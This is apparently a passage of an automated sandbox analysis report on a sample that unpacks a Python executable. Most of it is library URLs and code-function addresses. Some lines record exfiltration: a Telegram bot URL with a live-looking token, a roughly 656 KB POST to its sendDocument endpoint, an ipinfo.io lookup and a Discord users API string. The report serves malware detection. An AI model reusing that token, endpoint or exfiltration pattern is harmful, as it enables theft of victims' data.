                        Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://speleotrove.com/decimal/decarith.html
                        Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.231129087.00000000062A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/character-sets
                        Source: test.exe, 00000001.00000003.228724835.0000000005790000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230936770.0000000005790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.231129087.00000000062A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.nightmare.com/squirl/python-ext/misc/syslog.py
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                        Source: test.exe, 00000001.00000002.231367576.0000000006660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument
                        Source: test.exe, 00000001.00000002.231367576.0000000006660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocumentP
                        Source: test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                        Source: test.exe, 00000001.00000002.230840850.00000000056D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                        Source: test.exe, 00000001.00000002.231915752.00007FFD40522000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: test.exe, 00000001.00000003.224812362.0000000006725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=.net
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.ibm.com/
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm
                        Source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003519000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232284330.00007FFD40C2A000.00000002.00000001.01000000.00000011.sdmp, test.exe, 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: test.exe, 00000001.00000002.230840850.00000000056D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                        Source: test.exe, 00000001.00000002.231278195.0000000006440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.230404332.00000000047C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                        Source: test.exe, 00000001.00000002.230288294.0000000001750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
                        Source: unknownHTTP traffic detected: POST /bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument HTTP/1.1Accept-Encoding: identityContent-Length: 656063Host: api.telegram.orgUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11Content-Type: multipart/form-data; boundary=4c49b1f3a67a4c2585c4e333b5fb8eabConnection: close
                        Source: unknownDNS traffic detected: queries for: ipinfo.io
                        Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept-Encoding: identityHost: ipinfo.ioUser-Agent: Python-urllib/3.9Connection: close
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DFE00_2_0041DFE0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020400_2_00402040
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004060700_2_00406070
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402C000_2_00402C00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040520B0_2_0040520B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004065800_2_00406580
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409F800_2_00409F80
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE22891_2_00007FFD3FBE2289
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBFBF201_2_00007FFD3FBFBF20
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE4C371_2_00007FFD3FBE4C37
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE27661_2_00007FFD3FBE2766
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBFBD601_2_00007FFD3FBFBD60
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD17D401_2_00007FFD3FD17D40
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE32E71_2_00007FFD3FBE32E7
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE655F1_2_00007FFD3FBE655F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE30C11_2_00007FFD3FBE30C1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE41651_2_00007FFD3FBE4165
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE60A01_2_00007FFD3FBE60A0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FC4FA001_2_00007FFD3FC4FA00
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD979C01_2_00007FFD3FD979C0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE21B71_2_00007FFD3FBE21B7
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD839A01_2_00007FFD3FD839A0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE6A871_2_00007FFD3FBE6A87
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE3FDA1_2_00007FFD3FBE3FDA
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE1EA11_2_00007FFD3FBE1EA1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FC0B8501_2_00007FFD3FC0B850
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE22E81_2_00007FFD3FBE22E8
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE6F281_2_00007FFD3FBE6F28
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE704A1_2_00007FFD3FBE704A
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FE1F5701_2_00007FFD3FE1F570
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD175601_2_00007FFD3FD17560
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE51691_2_00007FFD3FBE5169
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FC0B4C01_2_00007FFD3FC0B4C0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE5D8A1_2_00007FFD3FBE5D8A
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE6EF11_2_00007FFD3FBE6EF1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE29CD1_2_00007FFD3FBE29CD
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE3B931_2_00007FFD3FBE3B93
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD1B2701_2_00007FFD3FD1B270
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBFF2001_2_00007FFD3FBFF200
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE114F1_2_00007FFD3FBE114F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE6CBC1_2_00007FFD3FBE6CBC
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE213F1_2_00007FFD3FBE213F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBFF0601_2_00007FFD3FBFF060
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE72C51_2_00007FFD3FBE72C5
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE1B221_2_00007FFD3FBE1B22
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBFEF001_2_00007FFD3FBFEF00
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FCC2EC01_2_00007FFD3FCC2EC0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE4D041_2_00007FFD3FBE4D04
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE46331_2_00007FFD3FBE4633
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE5DA31_2_00007FFD3FBE5DA3
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE5B0F1_2_00007FFD3FBE5B0F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE5E251_2_00007FFD3FBE5E25
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD82A601_2_00007FFD3FD82A60
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE4E4E1_2_00007FFD3FBE4E4E
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE23F11_2_00007FFD3FBE23F1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD128C01_2_00007FFD3FD128C0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE60DC1_2_00007FFD3FBE60DC
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE6FFF1_2_00007FFD3FBE6FFF
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE1A4B1_2_00007FFD3FBE1A4B
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE1CC11_2_00007FFD3FBE1CC1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE36931_2_00007FFD3FBE3693
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE5A601_2_00007FFD3FBE5A60
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD163801_2_00007FFD3FD16380
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE707C1_2_00007FFD3FBE707C
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE34861_2_00007FFD3FBE3486
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE1B311_2_00007FFD3FBE1B31
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD160801_2_00007FFD3FD16080
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE16221_2_00007FFD3FBE1622
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE72AC1_2_00007FFD3FBE72AC
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE57D11_2_00007FFD3FBE57D1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE3BA21_2_00007FFD3FBE3BA2
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE43591_2_00007FFD3FBE4359
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE47461_2_00007FFD3FBE4746
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE378D1_2_00007FFD3FBE378D
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE38321_2_00007FFD3FBE3832
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE1CFD1_2_00007FFD3FBE1CFD
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE29821_2_00007FFD3FBE2982
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE736A1_2_00007FFD3FBE736A
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE3A851_2_00007FFD3FBE3A85
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE2D0B1_2_00007FFD3FBE2D0B
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE35FD1_2_00007FFD3FBE35FD
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE266C1_2_00007FFD3FBE266C
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE72571_2_00007FFD3FBE7257
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE50AB1_2_00007FFD3FBE50AB
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE53C11_2_00007FFD3FBE53C1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE21351_2_00007FFD3FBE2135
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE59F71_2_00007FFD3FBE59F7
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD999901_2_00007FFD3FD99990
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE4AC51_2_00007FFD3FBE4AC5
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE54CF1_2_00007FFD3FBE54CF
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD818F01_2_00007FFD3FD818F0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE12991_2_00007FFD3FBE1299
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FD218101_2_00007FFD3FD21810
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE638E1_2_00007FFD3FBE638E
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE3A8F1_2_00007FFD3FBE3A8F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE4F3E1_2_00007FFD3FBE4F3E
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE22892_2_00007FFD3FBE2289
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBFBF202_2_00007FFD3FBFBF20
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE4C372_2_00007FFD3FBE4C37
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE27662_2_00007FFD3FBE2766
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBFBD602_2_00007FFD3FBFBD60
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD17D402_2_00007FFD3FD17D40
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE32E72_2_00007FFD3FBE32E7
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE655F2_2_00007FFD3FBE655F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE30C12_2_00007FFD3FBE30C1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE41652_2_00007FFD3FBE4165
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE60A02_2_00007FFD3FBE60A0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FC4FA002_2_00007FFD3FC4FA00
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD979C02_2_00007FFD3FD979C0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE21B72_2_00007FFD3FBE21B7
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD839A02_2_00007FFD3FD839A0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE6A872_2_00007FFD3FBE6A87
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE3FDA2_2_00007FFD3FBE3FDA
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE1EA12_2_00007FFD3FBE1EA1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FC0B8502_2_00007FFD3FC0B850
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE22E82_2_00007FFD3FBE22E8
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE6F282_2_00007FFD3FBE6F28
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE704A2_2_00007FFD3FBE704A
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FE1F5702_2_00007FFD3FE1F570
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD175602_2_00007FFD3FD17560
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE51692_2_00007FFD3FBE5169
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FC0B4C02_2_00007FFD3FC0B4C0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5D8A2_2_00007FFD3FBE5D8A
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE6EF12_2_00007FFD3FBE6EF1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE29CD2_2_00007FFD3FBE29CD
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE3B932_2_00007FFD3FBE3B93
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD1B2702_2_00007FFD3FD1B270
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBFF2002_2_00007FFD3FBFF200
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE114F2_2_00007FFD3FBE114F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE6CBC2_2_00007FFD3FBE6CBC
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE213F2_2_00007FFD3FBE213F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBFF0602_2_00007FFD3FBFF060
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE72C52_2_00007FFD3FBE72C5
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE1B222_2_00007FFD3FBE1B22
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBFEF002_2_00007FFD3FBFEF00
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FCC2EC02_2_00007FFD3FCC2EC0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE4D042_2_00007FFD3FBE4D04
